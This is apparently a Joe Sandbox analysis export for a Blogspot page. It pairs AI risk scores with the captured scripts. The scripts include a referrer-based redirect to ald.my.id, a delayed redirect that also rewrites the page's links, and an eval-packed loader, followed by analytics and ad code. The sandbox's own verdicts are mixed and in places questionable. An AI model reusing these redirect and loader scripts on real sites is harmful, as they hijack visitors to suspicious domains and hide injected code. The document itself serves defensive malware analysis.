| URL: http://home45insurance.blogspot.com Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": true,
"brand_spoofing_attempt": false,
"third_party_hosting": true
} |
URL: http://home45insurance.blogspot.com |
| URL: https://home45insurance.blogspot.com/... Model: Joe Sandbox AI | {
"risk_score": 6,
"reasoning": "The script exhibits moderate-risk behaviors, including redirecting users to an external domain and potentially collecting sensitive information (referrer URL and user agent) without clear transparency. While the script may have a legitimate purpose, such as analytics or tracking, the lack of context and the use of an obfuscated domain raise concerns that require further investigation."
} |
//<![CDATA[
var ars = 'https://ald.my.id';
if(['.google.', 'bing.', 'yandex.', '', 'duckduckgo.', 'yahoo.', '.', 'pinterest.'].some(s => document.referrer.toLowerCase().includes(s)) || ['fb', 'facebook', 'pinterest', 'twitter'].some(s => navigator.userAgent.toLowerCase().includes(s))){ window.location.href = ars + '/?arsae='+ encodeURIComponent(window.location.href) + '&arsae_ref='+ encodeURIComponent(document.referrer) }
//
|
| URL: https://ald.my.id/ Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false
} |
 |
| URL: https://ald.my.id/ Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false
} |
 |
| URL: https://ald.my.id/ Model: Joe Sandbox AI | {
"brands": "unknown"
} |
|
| URL: https://ald.my.id/ Model: Joe Sandbox AI | {
"brands": "unknown"
} |
|
| URL: https://ald.my.id Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": true,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": false,
"third_party_hosting": true
} |
URL: https://ald.my.id |
| URL: https://ald.my.id/... Model: Joe Sandbox AI | {
"risk_score": 8,
"reasoning": "This script exhibits several high-risk behaviors, including redirecting users to potentially malicious domains after a delay, and modifying all links on the page to include a 'redirected' parameter. These behaviors are highly suspicious and indicate a potential phishing or malware attempt."
} |
window.addEventListener('load', function(){
var r = 'redirected', hash, loc, urls, atags = document.getElementsByTagName('a'), i = atags.length, tag;
while(--i > -1){
if(!(tag = atags[i]).href || tag.search.indexOf(r) > -1){continue;}
hash = tag.hash;
loc = tag.href.replace(hash, '');
loc += (loc.indexOf('?') < 0? '?' : '&') + r + hash;
tag.href = loc;
}
if(location.search.indexOf(r) > -1){return;}
urls = ["https://ald7verify.blogspot.com/"];
setTimeout(function(){
window.location.href = urls[Math.floor(urls.length*Math.random())] + '?' + r;
}, 60000);
}, false);
|
| URL: https://ald.my.id/... Model: Joe Sandbox AI | {
"risk_score": 4,
"reasoning": "The script appears to be collecting referrer and user agent information, which could be used for tracking or analytics purposes. While the behavior is not inherently malicious, the use of a non-transparent domain ('ald.my.id') and the lack of clear context around the script's purpose warrant further review."
} |
//<![CDATA[
var ars = 'https://ald.my.id';
if(['.google.', 'bing.', 'yandex.', '', 'duckduckgo.', 'yahoo.', '.', 'pinterest.'].some(s => document.referrer.toLowerCase().includes(s)) || ['fb', 'facebook', 'pinterest', 'twitter'].some(s => navigator.userAgent.toLowerCase().includes(s))){ ars = ars + '/?arsae='+ encodeURIComponent(window.location.href) + '&arsae_ref='+ encodeURIComponent(document.referrer) }
//
|
| URL: https://ald.my.id/... Model: Joe Sandbox AI | {
"risk_score": 3,
"reasoning": "The provided JavaScript snippet appears to be a configuration object for an infinite scroll or auto-load functionality. It does not contain any high-risk indicators like dynamic code execution, data exfiltration, or suspicious redirects. The code uses standard JavaScript constructs and does not exhibit any malicious behavior. The only potential concern is the use of the `eval()` function, which can be a security risk if used improperly, but in this case, it seems to be part of a common obfuscation technique and does not pose a significant threat. Overall, the script appears to be a benign configuration setup with no clear signs of malicious intent."
} |
//<![CDATA[
window.config = {
infinite_scroll:false, // `true` jika mau pakai, `false` jika tidak
auto: false // `true` jika auto load, `false` jika harus klik tombol dulu
}
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('A c=["\\G\\F\\H\\z\\q\\e\\b\\a\\e\\b\\y\\q\\d\\h\\a\\h","\\f\\k\\i\\g\\n\\b","\\k\\i\\a\\d\\b\\a\\u\\m\\a\\p\\a\\e\\b","\\b\\r\\n\\a","\\b\\a\\I\\b\\j\\x\\d\\v\\d\\f\\k\\i\\g\\n\\b","\\f\\i\\k","\\t\\b\\b\\n\\f\\E\\j\\j\\k\\h\\e\\s\\i\\d\\K\\l\\g\\b\\s\\k\\q\\p\\j\\g\\l\\e\\g\\a\\m\\j\\D\\m\\q\\l\\l\\a\\i\\j\\p\\d\\f\\b\\a\\i\\j\\g\\l\\m\\q\\j\\v\\B\\s\\x\\f","\\d\\f\\r\\e\\k","\\d\\n\\n\\a\\e\\h\\z\\t\\g\\m\\h","\\t\\a\\d\\h","\\l\\a\\b\\u\\m\\a\\p\\a\\e\\b\\f\\Q\\r\\N\\d\\l\\M\\d\\p\\a","\\d\\h\\h\\u\\v\\a\\e\\b\\y\\g\\f\\b\\a\\e\\a\\i"];w[c[J]](c[0],P(){A o=w[c[2]](c[1]);o[c[3]]=c[4];o[c[5]]=c[6];o[c[7]]=L;w[c[C]](c[9])[0][c[8]](o)},O)',53,53,'||||||||||x65|x74|_0x6c73|x61|x6E|x73|x69|x64|x72|x2F|x63|x67|x6C|x70|_0xf37dx1|x6D|x6F|x79|x2E|x68|x45|x76|document|x6A|x4C|x43|var|x32|10|x62|x3A|x4F|x44|x4D|x78|11|x77|true|x4E|x54|false|function|x42'.split('|'),0,{}));
//
|
| URL: https://ald.my.id/... Model: Joe Sandbox AI | {
"risk_score": 3,
"reasoning": "The provided JavaScript snippet appears to be a tracking script, likely used for analytics or website statistics. It pushes data to the 'Histats' service, which is a legitimate web analytics platform. While the script uses some legacy practices like the `_Hasync` array, it does not exhibit any high-risk behaviors like dynamic code execution, data exfiltration, or suspicious redirects. The overall risk is low, as the script's purpose seems to be legitimate analytics and tracking."
} |
var _Hasync= _Hasync|| [];
_Hasync.push(['Histats.start', '1,4785196,4,0,0,0,00010000']);
_Hasync.push(['Histats.fasi', '1']);
_Hasync.push(['Histats.track_hits', '']);
(function() {
var hs = document.createElement('script'); hs.type = 'text/javascript'; hs.async = true;
hs.src = ('//s10.histats.com/js15_as.js');
(document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(hs);
})();
|
| URL: https://s10.histats.com/js15_as.js... Model: Joe Sandbox AI | {
"risk_score": 6,
"reasoning": "The provided JavaScript snippet exhibits several behaviors that raise moderate security concerns. While it does not contain any clear indicators of malicious intent, it exhibits some practices that could potentially be used for undesirable purposes. The key factors contributing to the medium risk score are:
1. External Data Transmission (+2 points): The script sends user data to third-party domains via XHR, fetch, or sendBeacon without clear transparency.
2. Fallback Domains (+2 points): The script uses multiple fallback domains, some of which may be of unknown or dubious reputation.
3. Aggressive DOM Manipulation (+2 points): The script repeatedly alters or clears the DOM, which could potentially be used for malicious purposes.
While the script does not contain any high-risk indicators like dynamic code execution or obvious data exfiltration, the combination of these moderate-risk behaviors warrants further review and investigation to ensure the script's legitimacy and intended purpose. Additional context or information about the script's usage and the reputation of the involved domains would be helpful in providing a more accurate risk assessment."
} |
(function(){var n="undefined",t=function(t){return typeof t!==n},e="js15_as.js",r="",i=!1,o=!1,a=!1,s=!1,c="0.2.1",u=25,_="-",f="_HISTATS_SID",d="histats_custom_destDivProducer",p=function(n){_+="_"+n};p(c);var v=function(){i&&console.log.apply(this,arguments)},l=function(n,r){var i=n||{};try{var o=r.document,a=r.navigator,s=r.screen,c=r.Date,f=r.Math,d=function(){return o},p=function(){return d().getElementsByTagName("body")[0]||d().getElementsByTagName("head")[0]},l=function(n){return"function"==typeof n},h=function(n){return t(n)&&n instanceof Array},m=function(n){return t(n)&&!!d().getElementById(n)},y=function(n){var e=!1;if(t(n)){if("NaN"==parseInt(n))return!1;e=parseInt(n)>0}return e},g=function(n){return y(n)?parseInt(n):0},w=function(n){return"string"!=typeof n||n.length<1?n:n.replace(/^['"]?(.*)['"]$/,"$1")},T=t(window["_DEBUG_HISTATS_ASYNCR_DO_NOT_AUTOSTART"]),I=function(){return parseInt(1e4*f.random())+1},H=function(){return Math.floor(4e8*Math.random())-2e8},C=I(),E="histats_counter",b=H(),S=function(n,e,r){if(!t(n))return t(r)&&r(n),void 0;for(var i in n)n.hasOwnProperty(i)&&e(i,n[i],n)},R=0,O=function(){R++},A=function(n){return"string"==typeof n},D=function(n){var e=!1;return t(n)&&A(n)&&(e=(n+"").length>0),e},N="1000",U="0",B="0.php?";i.o_i=0,i.ver=16,i.eve=3,i.cver=0,i.s_id=0,i.s_pd=0,i.d_op=0,i.i_dom=4,i.i_id=0,i.i_w=0,i.i_h=0,i.i_b="",i.s_d="",i.s_u="",i.s_l="0",i.s_t="",i.d_s=0,i.d_fa=0;var j=0,F=0;i.d_tf=0,i.d_nv=1,i.d_mu=0,i.d_cv=0,i.d_cs=0,i.d_cp=0,i.d_pON=0;var G=45e3,x=0;i.d_pn=0,i.d_pt=0,i.f_pv=0,i.s_ta="",i.a_va=[],i.s_ti="",i.asi=0,i.o_fa=0,i.o_de=0,i.o_BC=0,i.o_fr=0,i.p_ff=0,i.n_a="",i.n_f=0,i.n_n=0,i.o_n=0;var k=31536e6;i.c_on=0,i.s_sc1="1",i.s_sc2="11111111",i.s_asc2={};var L=function(){return i.i_id},M=function(n){i.i_id=g(n)},q=function(){return 700==L()||0==L()},P=function(){var n=L();return!q()&&n>0&&n<5e3},z=function(){return L()>=8e3&&L()<9e3},J=function(){return L()>=1e4&&L()<10100},W=function(){return L()>=500&&L()<600},Y=function(n){artificialFrameRequestReference=r.setTimeout(n,1e3/u)},$=r.requestAnimationFrame||r.webkitRequestAnimationFrame||r.mozRequestAnimationFrame||r.msRequestAnimationFrame||r.oRequestAnimationFrame||Y,K=function(){return 1==i.asi||"1"==i.asi},V=function(){i.asi=1},Q="";i.fasi=function(n){i.asi=n};var X="https://",Z=function(){try{return"https:"===o.location.protocol?"https://":"http://"}catch(n){return"https://"}},nn=function(){try{return"https:"===o.location.protocol}catch(n){return!1}},tn=function(){return"s10.histats.com"},en=function(){return"s10.histats.com"},rn=function(){return"s"+i.i_dom+".histats.com"},on=function(){return"s"+i.i_dom+"i.histats.com"},an=function(n){d().writeln('<script type="text/javascript" language="JavaScript" src="'+n+'"></script>')},sn=function(n){return'<script type="text/javascript" language="JavaScript" >document.writeln(\''+n+"');</script>"},cn=function(n){d().writeln(sn(n))},un=function(n){d().write(n)},_n=function(){var n='<div id="'+Bn()+'" style="display: none;"></div>';un(n),E=Bn()},fn=function(){var n=d().createElement("div");n.id=Bn();var t=d().getElementById("histats_counter");t?t.appendChild(n):v("err_10")},dn=!0,pn=[0,1500,5e3],vn=function(n,t,e){var r=[0,1500,5e3],i=[],o=!1;for(var a in r){var s=r[a],c=function(n){for(;i.length;){var t=i.pop();clearTimeout(t)}o||(o=!0,e(n))},u=setTimeout(function(){dn&&ln(n,c)},s);i.push(u)}},ln=function(n,t){var e=d().createElement("script");try{e.async=!0}catch(r){}e.type="text/javascript",e.src=n,e&&"function"==typeof t&&(e.readyState?e.onreadystatechange=function(){var n=e.readyState;("loaded"==n||"complete"==n||parseInt(n)>1)&&(e.onreadystatechange=null,t(r))}:"function"==typeof e.addEventListener?e.addEventListener("load",function(n){t(n)}):dn=!1),p().appendChild(e)},hn=function(){return 1==i.p_ff},mn=function(){return i.p_ff=1},yn=function(){return i.o_fa>0},gn=function(){return i.o_fa=1};i.is=t,i.isd=y;var wn=function(){return i.s_id},Tn=function(){return wn()<1},In=function(n){i |
| URL: https://pagead2.googlesyndication.com/pagead/js/ad... Model: Joe Sandbox AI | ```json
{
"risk_score": 4,
"reasoning": "The script uses dynamic code execution through 'execScript', which is a high-risk indicator (+3 points). It also includes aggressive DOM manipulation patterns, such as altering global objects and properties, which is a moderate-risk indicator (+2 points). However, there is no clear evidence of data exfiltration or interaction with suspicious domains, which keeps the score in the medium risk range."
} |
(function(sttc){'use strict';var aa,ba=Object.defineProperty;function ca(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var da=ca(this),ea=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",fa={},ha={};function ia(a,b,c){if(!c||a!=null){c=ha[b];if(c==null)return a[b];c=a[c];return c!==void 0?c:a[b]}}
function ja(a,b,c){if(b)a:{var d=a.split(".");a=d.length===1;var e=d[0],f;!a&&e in fa?f=fa:f=da;for(e=0;e<d.length-1;e++){var g=d[e];if(!(g in f))break a;f=f[g]}d=d[d.length-1];c=ea&&c==="es6"?f[d]:null;b=b(c);b!=null&&(a?ba(fa,d,{configurable:!0,writable:!0,value:b}):b!==c&&(ha[d]===void 0&&(a=Math.random()*1E9>>>0,ha[d]=ea?da.Symbol(d):"$jscp$"+a+"$"+d),ba(f,ha[d],{configurable:!0,writable:!0,value:b})))}}ja("Symbol.dispose",function(a){return a?a:Symbol("Symbol.dispose")},"es_next");/*
Copyright The Closure Library Authors.
SPDX-License-Identifier: Apache-2.0
*/
var p=this||self;function ka(a,b){var c=la("CLOSURE_FLAGS");a=c&&c[a];return a!=null?a:b}function la(a){a=a.split(".");for(var b=p,c=0;c<a.length;c++)if(b=b[a[c]],b==null)return null;return b}function ma(a){var b=typeof a;return b=="object"&&a!=null||b=="function"}function na(a){return Object.prototype.hasOwnProperty.call(a,oa)&&a[oa]||(a[oa]=++pa)}var oa="closure_uid_"+(Math.random()*1E9>>>0),pa=0;function qa(a,b,c){return a.call.apply(a.bind,arguments)}
function ra(a,b,c){if(!a)throw Error();if(arguments.length>2){var d=Array.prototype.slice.call(arguments,2);return function(){var e=Array.prototype.slice.call(arguments);Array.prototype.unshift.apply(e,d);return a.apply(b,e)}}return function(){return a.apply(b,arguments)}}function sa(a,b,c){sa=Function.prototype.bind&&Function.prototype.bind.toString().indexOf("native code")!=-1?qa:ra;return sa.apply(null,arguments)}
function ta(a,b,c){a=a.split(".");c=c||p;a[0]in c||typeof c.execScript=="undefined"||c.execScript("var "+a[0]);for(var d;a.length&&(d=a.shift());)a.length||b===void 0?c[d]&&c[d]!==Object.prototype[d]?c=c[d]:c=c[d]={}:c[d]=b};let ua=(new Date).getTime();function va(a){p.setTimeout(()=>{throw a;},0)};function wa(a){return/^[\s\xa0]*([\s\S]*?)[\s\xa0]*$/.exec(a)[1]}
function xa(a,b){let c=0;a=wa(String(a)).split(".");b=wa(String(b)).split(".");const d=Math.max(a.length,b.length);for(let g=0;c==0&&g<d;g++){var e=a[g]||"",f=b[g]||"";do{e=/(\d*)(\D*)(.*)/.exec(e)||["","","",""];f=/(\d*)(\D*)(.*)/.exec(f)||["","","",""];if(e[0].length==0&&f[0].length==0)break;c=za(e[1].length==0?0:parseInt(e[1],10),f[1].length==0?0:parseInt(f[1],10))||za(e[2].length==0,f[2].length==0)||za(e[2],f[2]);e=e[3];f=f[3]}while(c==0)}return c}function za(a,b){return a<b?-1:a>b?1:0};var Aa=ka(610401301,!1),Ba=ka(653718497,ka(1,!0));function Ca(){var a=p.navigator;return a&&(a=a.userAgent)?a:""}var Da;const Ea=p.navigator;Da=Ea?Ea.userAgentData||null:null;function Fa(a){return Aa?Da?Da.brands.some(({brand:b})=>b&&b.indexOf(a)!=-1):!1:!1}function q(a){return Ca().indexOf(a)!=-1};function Ga(){return Aa?!!Da&&Da.brands.length>0:!1}function Ha(){return Ga()?!1:q("Trident")||q("MSIE")}function Ia(){return Ga()?Fa("Microsoft Edge"):q("Edg/")}function Ja(){!q("Safari")||Ka()||(Ga()?0:q("Coast"))||(Ga()?0:q("Opera"))||(Ga()?0:q("Edge"))||Ia()||Ga()&&Fa("Opera")}function Ka(){return Ga()?Fa("Chromium"):(q("Chrome")||q("CriOS"))&&!(Ga()?0:q("Edge"))||q("Silk")}function La(a){const b={};a.forEach(c=>{b[c[0]]=c[1]});return c=>b[c.find(d=>d in b)]||""}
function Ma(){var a=Ca();if(Ha()){var b=/rv: *([\d\.]*)/.exec(a);if(b&&b[1])a=b[1];else{b="";var c=/MSIE +([\d\.]+)/.exec(a);if(c&&c[1])if(a=/Trident\/(\d.\d)/.exec(a),c[1]=="7.0")if(a&&a[1])switch(a[1]){case "4.0":b="8.0";break;case "5.0":b="9.0";break;case "6.0":b="10.0";break;case "7.0":b="11.0"}else b="7.0";else b=c[1];a=b}return a}c=RegExp("([A-Z][\\w ]+)/([^\\s]+)\\s*(?:\\((.*?)\\))? |
Edit tour
chrome.exe (PID: 6980 cmdline: 
Key Decision
Richest Path
Thread / callback creation
Lower opacity -> Library Node